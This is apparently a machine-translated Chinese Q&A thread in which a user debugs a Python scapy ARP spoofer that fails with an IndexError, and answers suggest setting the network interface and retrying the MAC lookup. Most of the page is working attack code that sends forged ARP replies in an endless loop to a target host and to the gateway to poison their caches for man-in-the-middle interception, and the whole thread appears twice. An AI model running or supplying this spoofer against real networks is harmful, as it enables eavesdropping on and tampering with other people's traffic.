Python 使用scapy模块的ARP欺骗
Python ARP spoofer using scapy module
我正在尝试按照我在网上找到的教程编写一个基本的 arp 欺骗程序。
所以我编写了 arpSpoofer 的基本 beginnig 但是当我执行它时抛出一个 IndexError: list index out of range...我确定我在代码上犯了一个愚蠢的错误但是我真的找不到它并且我一直在尝试小时。
代码是这样的:
import scapy.all as scapy
from scapy import *
import time
def get_mac(ip):
arp_request = scapy.ARP(pdst = ip)
broadcast = scapy.Ether(dst = "ff:ff:ff:ff:ff:ff")
arp_request_broadcast = broadcast / arp_request
answered_list = scapy.srp(arp_request_broadcast, timeout = 1, verbose = False)[0]
return answered_list[0][1].hwsrc
def spoof(target_ip, spoof_ip):
target_mac = get_mac(target_ip)
packet = scapy.ARP(op=2, pdst=target_ip, hwdst=target_mac, psrc=spoof_ip)
scapy.send(packet)
while True:
spoof("192.168.1.79", "192.168.1.1")
spoof("192.168.1.1", "192.168.1.79")
准确的错误信息是:
Traceback (most recent call last):
File "arp_spoof.py", line 26, in <module>
spoof("192.168.1.79", "192.168.1.1")
File "arp_spoof.py", line 18, in spoof
target_mac = get_mac(target_ip)
File "arp_spoof.py", line 15, in get_mac
return answered_list[0][1].hwsrc
File "/usr/lib/python3/dist-packages/scapy/plist.py", line 118, in __getitem__
return self.res.__getitem__(item)
IndexError: list index out of range
非常感谢您的帮助...提前致谢! :)
确实answered_list必须为空。在尝试提取碎片之前,您应该检查这种情况。
可能您需要告诉 Scapy 使用特定接口或调整您的路由规则。将 iface 参数添加到 srp 函数。在 Linux 上,这将类似于 'eth0' 或 'enp1s0'。在 Windows 上,这将是有意义的接口名称,例如 'Network Connection 1' 或其他名称。
你可以在scapy中输入conf.iface查看默认界面。很多时候,默认选择的是错误的。很可能,这就是为什么您得到一个空列表的原因。
请注意:这是重复:
import scapy.all as scapy
from scapy import *
从模块或包导入 * 的做法通常不是好的做法,原因如下:Why import star in Python is a bad idea
Below are some points about why import * should not be used:
- Code Readability
- It is always remains a mystery what is imported and cannot be found easily from - which module a certain thing was imported that result in
low code readability.
- Polluting the namespace,
import * imports all the functions and classes in your own namespace that may clash with the function and
classes you define or function and classes of other libraries that you
may import.
- Concrete possibility of hiding bugs
- Tools like pyflakes can’t be used to statically detect errors in the source code.
最好只导入您需要的内容,例如:
from scapy.all import srp,send,ARP
scapy_ip = scapy.ARP(pdst=ip)
scapy_mac = scapy.Ether(dst="ff:ff:ff:ff:ff:ff")
scapy_broadcast = scapy_mac/scapy_ip
ans, unans = scapy.srp(scapy_broadcast, timeout=1, iface="eth0")
for i in ans:
print(i[1].psrc, i[1].hwsrc)
我如下更改了 get_mac 函数以确保 mac 不为空
def get_mac(ip):
mac = "xx"
while mac == "xx":
try:
arp_request = scapy.ARP(pdst=ip)
broadcast = scapy.Ether(dst="ff:ff:ff:ff:ff:ff")
arp_request_broadcast = broadcast/arp_request
answered_list = scapy.srp(arp_request_broadcast, timeout=1 , verbose=False)[0]
mac = answered_list[0][1].hwsrc
# print(mac)
except:
pass
finally:
return mac
我正在尝试按照我在网上找到的教程编写一个基本的 arp 欺骗程序。 所以我编写了 arpSpoofer 的基本 beginnig 但是当我执行它时抛出一个 IndexError: list index out of range...我确定我在代码上犯了一个愚蠢的错误但是我真的找不到它并且我一直在尝试小时。 代码是这样的:
import scapy.all as scapy
from scapy import *
import time
def get_mac(ip):
arp_request = scapy.ARP(pdst = ip)
broadcast = scapy.Ether(dst = "ff:ff:ff:ff:ff:ff")
arp_request_broadcast = broadcast / arp_request
answered_list = scapy.srp(arp_request_broadcast, timeout = 1, verbose = False)[0]
return answered_list[0][1].hwsrc
def spoof(target_ip, spoof_ip):
target_mac = get_mac(target_ip)
packet = scapy.ARP(op=2, pdst=target_ip, hwdst=target_mac, psrc=spoof_ip)
scapy.send(packet)
while True:
spoof("192.168.1.79", "192.168.1.1")
spoof("192.168.1.1", "192.168.1.79")
准确的错误信息是:
Traceback (most recent call last):
File "arp_spoof.py", line 26, in <module>
spoof("192.168.1.79", "192.168.1.1")
File "arp_spoof.py", line 18, in spoof
target_mac = get_mac(target_ip)
File "arp_spoof.py", line 15, in get_mac
return answered_list[0][1].hwsrc
File "/usr/lib/python3/dist-packages/scapy/plist.py", line 118, in __getitem__
return self.res.__getitem__(item)
IndexError: list index out of range
非常感谢您的帮助...提前致谢! :)
确实answered_list必须为空。在尝试提取碎片之前,您应该检查这种情况。
可能您需要告诉 Scapy 使用特定接口或调整您的路由规则。将 iface 参数添加到 srp 函数。在 Linux 上,这将类似于 'eth0' 或 'enp1s0'。在 Windows 上,这将是有意义的接口名称,例如 'Network Connection 1' 或其他名称。
你可以在scapy中输入conf.iface查看默认界面。很多时候,默认选择的是错误的。很可能,这就是为什么您得到一个空列表的原因。
请注意:这是重复:
import scapy.all as scapy
from scapy import *
从模块或包导入 * 的做法通常不是好的做法,原因如下:Why import star in Python is a bad idea
Below are some points about why
import *should not be used:
- Code Readability
- It is always remains a mystery what is imported and cannot be found easily from - which module a certain thing was imported that result in low code readability.
- Polluting the namespace,
import *imports all the functions and classes in your own namespace that may clash with the function and classes you define or function and classes of other libraries that you may import.- Concrete possibility of hiding bugs
- Tools like pyflakes can’t be used to statically detect errors in the source code.
最好只导入您需要的内容,例如:
from scapy.all import srp,send,ARP
scapy_ip = scapy.ARP(pdst=ip)
scapy_mac = scapy.Ether(dst="ff:ff:ff:ff:ff:ff")
scapy_broadcast = scapy_mac/scapy_ip
ans, unans = scapy.srp(scapy_broadcast, timeout=1, iface="eth0")
for i in ans:
print(i[1].psrc, i[1].hwsrc)
我如下更改了 get_mac 函数以确保 mac 不为空
def get_mac(ip):
mac = "xx"
while mac == "xx":
try:
arp_request = scapy.ARP(pdst=ip)
broadcast = scapy.Ether(dst="ff:ff:ff:ff:ff:ff")
arp_request_broadcast = broadcast/arp_request
answered_list = scapy.srp(arp_request_broadcast, timeout=1 , verbose=False)[0]
mac = answered_list[0][1].hwsrc
# print(mac)
except:
pass
finally:
return mac